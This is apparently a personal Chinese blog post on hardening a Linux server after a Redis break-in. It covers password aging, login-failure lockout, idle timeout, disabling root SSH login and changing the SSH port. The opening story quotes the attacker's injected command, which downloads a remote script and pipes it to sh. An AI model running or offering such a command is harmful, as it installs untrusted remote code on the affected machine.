安裝完Linux需要做的關於安全的事
故事是這樣子的
最近主機受到攻擊,原因可能是redis集群沒有設置密碼(因為快過期了,不想搞得太複雜就沒設),然後被人家搞事情了,就被人一把set了些執行腳本,形如curl -fsSL //d.powerofwish.com/pm.sh | sh,真的是猥瑣啊,我登上主機一看,簡直是猥瑣至極,不能忍了啊。
⚡/ataola/github ssh [email protected]
[email protected]'s password:
Last failed login: Sat Jul 11 09:52:04 CST 2020 from 182.61.37.35 on ssh:notty
There were 206 failed login attempts since the last successful login.
Last login: Fri Jul 10 16:42:01 2020 from 122.224.125.196
⚡ root@ataola ~
以下是我做的一些努力,分享一下。
Linux賬戶口令生存期策略
口令老化(Password aging)是一種增強的系統口令生命期認證機制,能夠確保用戶的口令定期更換,提高系統安全性。
我們可以這樣子做,把密碼設置成三個月過期,具體的操作步驟如下:
# 打開etc目錄下的login.defs
vim /etc/login.defs
# 添加樓下內容
PASS_MAX_DAYS 90
Linux賬戶登錄失敗鎖定策略
設置賬戶登錄失敗鎖定策略,加大用戶口令被暴力破解的難度。
我們可以這樣子做,只要是對面那位連續輸錯5次密碼,我們就給它關小黑屋5分鐘。,具體的操作步驟如下:
# 打開etc目錄下的pam.d下的password-auth文件
vim /etc/pam.d/password-auth
# 添加樓下內容
auth required pam_tally2.so deny=5 unlock_time=300 even_deny_root root_unlock_time=300
account required pam_tally2.so
Linux賬戶超時自動登出策略
配置帳戶超時自動登出,在用戶輸入空閑一段時間後自動斷開。
具體操作如下:
# 打開/etc/profile
vim /etc/profile
# 輸入樓下內容
export TMOUT=180
限制root用戶遠程登錄策略
限制root許可權遠程登錄。先以普通許可權用戶遠程登錄後,再切換到超級管理員許可權帳號後執行相應操作,可以提升系統安全性。
具體操作如下:
# 打開/etc/ssh/sshd_config
vim /etc/ssh/sshd_config
# 添加樓下內容
PermitRootLogin no
# 重啟sshd服務
更改ssh監聽埠
SSH監聽在默認的22埠容易受到暴力破解攻擊,修改為非默認埠可以提高系統的安全性
具體操作是修改/etc/ssh/sshd_config配置文件中的埠欄位配置(Port欄位),並重啟服務
終極大招
封ip吧。。。。。。
本作品採用知識共享署名-非商業性使用-相同方式共享 4.0 國際許可協議進行許可。
